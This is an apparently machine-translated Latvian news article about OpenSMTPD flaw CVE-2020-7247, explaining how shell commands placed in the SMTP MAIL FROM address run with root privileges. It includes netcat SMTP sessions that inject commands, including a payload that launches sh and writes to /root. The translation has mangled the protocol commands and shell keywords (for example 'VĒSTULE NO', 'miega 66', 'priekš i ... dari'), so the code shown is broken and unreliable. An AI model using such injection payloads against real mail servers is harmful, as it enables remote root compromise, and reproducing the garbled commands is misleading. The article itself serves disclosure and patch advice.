OpenSMTPD ievainojamība, kas ļauj attālināti izpildīt kodu ar root tiesībām

Pasta serverī, ko izstrādāja OpenBSD projekts AtvērtSMTPD identificēts kritiska ievainojamība (CVE-2020-7247), kas ļauj attālināti izpildīt čaulas komandas serverī ar root privilēģijām. Ievainojamība tika atklāta atkārtotas revīzijas laikā, ko veica Qualys Security (iepriekšējā OpenSMTPD revīzija). tika iznests ārā 2015. gadā, un jaunā ievainojamība pastāv kopš 2018. gada maija). Problēma likvidēta OpenSMTPD 6.6.2 laidienā. Visiem lietotājiem ieteicams nekavējoties instalēt atjauninājumu (OpenBSD gadījumā ielāpu var instalēt, izmantojot syspatch).

Ir ierosināti divi uzbrukuma varianti. Pirmais variants darbojas ar noklusējuma OpenSMTPD konfigurāciju (pieprasījumu saņemšana tikai no localhost) un ļauj lokāli izmantot ievainojamību, ja uzbrucējam ir piekļuve lokālā tīkla saskarnei (cilpas atgriezeniskajai saitei) serverī (piemēram, mitināšanas sistēmās). Otrais variants rodas, ja OpenSMTPD ir konfigurēts ārējo tīkla pieprasījumu saņemšanai (pasta serveris, kas pieņem trešo pušu pastu). Pētnieki ir sagatavojuši prototipa izmantošanu, kas veiksmīgi darbojas gan ar OpenSMTPD variantu, kas iekļauts OpenBSD 6.6, gan ar portatīvo versiju citām operētājsistēmām (veikts Debian Testēšana).

Problēmu rada kļūda funkcijā smtp_mailaddr(), kas tiek izsaukta, lai validētu vērtības laukos "MAIL FROM" un "RCPT TO", kas definē sūtītāju/saņēmēju un tiek pārsūtītas savienojuma laikā ar pasta serveri. Lai validētu e-pasta adreses daļu, kas atrodas pirms simbola "@", smtp_mailaddr() izsauc šo funkciju.
valid_localpart(), kas uzskata rakstzīmes "!#$%&'*/?^`{|}~+-=_" par derīgām (MAILADDR_ALLOWED), kā to pieprasa RFC 5322.

Šajā gadījumā tiešā virknes aizstāšana tiek veikta funkcijā mda_expand_token(), kas aizstāj tikai rakstzīmes "!#$%&'*?`{|}~" (MAILADDR_ESCAPE). Pēc tam, izsaucot piegādes aģentu (MDA), izmantojot komandu 'execle(«/bin/sh», «/bin/sh», «-c», mda_command,…', tiek izmantota funkcijā mda_expand_token() sagatavotā virkne. Ja ziņojums tiek ievietots mbox mapē, izmantojot /bin/sh, tiek izpildīta rinda "/usr/libexec/mail.local -f %%{mbox.from} %%{user.username}", kur vērtība "%{mbox.from}" ietver aizstāšanas datus no parametra "MAIL FROM".

Ievainojamība slēpjas loģiskā kļūdā funkcijā smtp_mailaddr(), kuras dēļ funkcija atgriež veiksmīgas verifikācijas kodu, ja e-pastā tiek nodots tukšs domēns, pat ja adreses daļa pirms "@" satur nederīgas rakstzīmes. Sagatavojot virkni, funkcija mda_expand_token() izmanto tikai tās rakstzīmes, kas ir atļautas e-pasta adresēs, nevis visas iespējamās čaulas speciālās rakstzīmes. Tādēļ, lai palaistu komandu, e-pasta lokālajā daļā ir jāizmanto tikai rakstzīme ";" un atstarpe, kas nav iekļautas MAILADDR_ESCAPE kopā un netiek izmantotas ar atsoļa rakstzīmēm. Piemēram:

$ nc 127.0.0.1 25

HELO profesors.Falkens
VĒSTULE NO:<;sleep 66;>
SAŅEMT UZ:
DATU
.
QUIT

Pēc šīs sesijas OpenSMTPD, piegādājot uz mbox, palaidīs komandu, izmantojot čaulu.

/usr/libexec/mail.local -f; miega 66; root

Uzbrukuma virsmu ierobežo fakts, ka adreses lokālā daļa nedrīkst pārsniegt 64 rakstzīmes, un speciālās rakstzīmes '$' un '|' atsoļa laikā tiek aizstātas ar ":". Lai apietu šo ierobežojumu, e-pasta pamatteksts tiek nodots ievades straumē pēc /usr/libexec/mail.local palaišanas. Tas nozīmē, ka, manipulējot ar adresi, var palaist tikai sh komandu interpretētāju un e-pasta pamattekstu var izmantot kā instrukciju kopu. Tā kā pakalpojuma SMTP galvenes ir norādītas e-pasta sākumā, tiek piedāvāta cilpas lasīšanas komanda, lai tās izlaistu. Darbojošais izmantošanas veids izskatās apmēram šādi:

$ nc 192.168.56.143 25

HELO profesors.Falkens
VĒSTULE NO:<;for i in 0 1 2 3 4 5 6 7 8 9 abcd;do read r;done;sh;exit 0;>
KVĪTS UZ:
DATU
#0
#1
...
#d
priekš i WOPR; dari
echo -n "($i) " && id || pārtraukums
darīts > /root/x."`id -u`.""$$"
.
QUIT

Avots: opennet.ru